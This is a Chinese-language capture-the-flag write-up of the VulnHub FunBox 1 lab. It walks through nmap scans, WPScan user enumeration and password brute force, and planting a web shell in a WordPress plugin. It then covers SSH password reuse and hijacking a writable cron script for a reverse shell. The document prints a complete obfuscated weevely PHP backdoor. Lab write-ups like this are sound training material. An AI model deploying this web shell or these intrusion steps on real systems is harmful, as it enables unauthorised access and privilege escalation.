FunBox详情请见:https://www.vulnhub.com/entry/funbox-1,518/
靶机使用VirtualBox搭建,连接VirtualBox Host-Only网卡,IP为:192.168.56.101
攻击机是VMware下的一台Kali,使用桥接模式,桥接至VirtualBox Host-Only网卡,IP为:192.168.56.177
Nmap扫描C段内存活主机
nmap -sP 192.168.56.1/24
发现靶机IP:192.168.56.101
扫描开放端口服务及启用操作系统检测,版本检测,脚本扫描和跟踪路由
nmap -A -sT 192.168.56.101
访问192.168.56.101发现被301重定向跳转到http://funbox.fritz.box/
修改攻击机/etc/hosts,增加一条
192.168.56.101 funbox.fritz.box
即可正常访问
在之前的Nmap扫描得知这是WordPress 5.4.2的站,使用WPscan枚举用户
wpscan --url http://funbox.fritz.box/ --enumerate u
使用WPscan爆破用户密码,字典为Kali自带字典(加了些平常自己收集的一些密码)/usr/share/wordlists/dirb/big.txt
wpscan --url http://funbox.fritz.box/ -P /usr/share/wordlists/dirb/big.txt --max-threads 100
admin用户登录后台可直接修改插件内容(修改的插件内容需要先关闭使用状态)
使用weevely生成一个PHP木马
<?php
$d='p://input"!F),$m!F)==1!F) {@ob_star!Ft();@e!Fval(@!Fgzuncom!Fpres!Fs(!F@x(@base!F64_!Fdecode(!F$m[1]),$k)))!F;!F!F$';
$k=str_replace('Mu','','MucreaMutMuMueMuMu_function');
$f='i++){$o.=$t!F{$i}^$k{$j};}}r!Feturn $!Fo;}!F!Fif (@preg!F_match("/$kh(!F.+)$!Fkf/",@f!File_!Fget_con!Ftent!Fs("ph!F';
$O='o=@ob_get_conte!Fnts();@!Fob_en!Fd_cl!Fean()!F;$r=!F@b!Fase64_en!Fcode(@x(@gzco!F!Fmpr!Fess!F($o),!F$k!F));print("$p$kh$r$kf");}';
$Q='$k){$c=strlen($k)!F!F;$l=st!Frlen!F($t!F)!F;!F$o="";for($i=!F0;$i<!F$l;){for($j=0;($j<!F$c&&$i<!F$l);$!Fj+!F+,!F$!F';
$s='$k=!F"bc5682e!F4";$k!Fh="f!F!F0bfbabfef4d";$kf="!Faeaab!F562!Fae!Fd!F7";$p="vsHQV!FqAVJ0T!FRXxRB";funct!Fion !F!Fx($!Ft,';
$w=str_replace('!F','',$s.$Q.$f.$d.$O);
$I=$k('',$w);$I();
?>
写入http://funbox.fritz.box/wp-content/plugins/akismet/index.php,weevely连接
weevely http://funbox.fritz.box/wp-content/plugins/akismet/index.php seanz7
cat /etc/passwd发现还存在两个用户funny和joe,其中joe可以直接使用之前爆破出来的密码直接ssh登录
PS:www-data权限要比joe权限更大一点
在/home/funny目录下发现两个.sh文件
.reminder.sh
系统不定时运行.backup.sh,并且当前用户对.backup.sh拥有所有权限
.backup.sh
那就可以通过修改.backup.sh的内容为nc反弹,当root或者其他用户执行直接反弹一个root或者比当前用户权限更高的用户shell
修改内容如下
攻击机直接监听
nc -lvp 1234
funny用户每两分钟执行一次
root用户每五分钟执行一次
所以要弹到root的shell还是挺看运气的,得多尝试
